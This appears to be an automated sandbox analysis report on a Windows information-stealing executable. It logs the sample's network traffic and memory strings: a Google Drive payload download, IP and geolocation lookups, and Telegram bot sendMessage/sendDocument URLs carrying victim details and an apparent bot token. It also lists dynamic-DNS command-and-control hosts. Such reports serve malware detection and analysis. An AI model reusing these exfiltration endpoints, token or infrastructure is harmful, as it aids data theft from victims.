            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49703 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49714 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49717 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49719 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20and%20Time:%2011/03/2025%20/%2019:20:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20992547%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:53:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003556D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/K0UVAKe5N94.crl0
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt05
            Source: hUMdKouQ1H.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: hUMdKouQ1H.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3823056775.0000000037DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/8CI0%
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003556D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:992547%0D%0ADate%20a
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME/sendDocument?chat_id=7160
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000354F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/P
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D72000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3819926903.0000000034530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSaG
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2755030960.0000000004DAF000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=download
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2755030960.0000000004DAF000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16mIfz-eiK-erVV3ZLLN6Tu__a6thnGSa&export=downloadtx
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003542D000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003546A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003542D000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035445000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3820358156.00000000353EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.000000003664A000.00000004.00000800.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3821501336.0000000036687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: hUMdKouQ1H.exe, 0000000A.00000003.2671264411.0000000004DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.000000003552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.5:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_00403348
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile created: C:\Windows\BehovsundersgelsesJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_6FF71A980_2_6FF71A98
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_0040694510_2_00406945
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_0040711C10_2_0040711C
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFD59910_2_04BFD599
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFC5C010_2_04BFC5C0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF77A010_2_04BF77A0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFD2C810_2_04BFD2C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF537010_2_04BF5370
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFCD2810_2_04BFCD28
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFBEB010_2_04BFBEB0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFCFF710_2_04BFCFF7
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF7F1810_2_04BF7F18
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFD86910_2_04BFD869
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF596810_2_04BF5968
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFEAA810_2_04BFEAA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFAA7810_2_04BFAA78
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFCA5810_2_04BFCA58
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFC78810_2_04BFC788
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF3E0910_2_04BF3E09
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BF29E010_2_04BF29E0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFEA9A10_2_04BFEA9A
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04BFFBEB10_2_04BFFBEB
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7185010_2_04C71850
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C791C810_2_04C791C8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C74EC810_2_04C74EC8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7269010_2_04C72690
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7EE0010_2_04C7EE00
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C71FA810_2_04C71FA8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7CB4010_2_04C7CB40
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7E0F710_2_04C7E0F7
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7E0F810_2_04C7E0F8
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7DC9F10_2_04C7DC9F
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7DCA010_2_04C7DCA0
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7D84410_2_04C7D844
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7184110_2_04C71841
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7004010_2_04C70040
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7D84810_2_04C7D848
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_04C7000710_2_04C70007
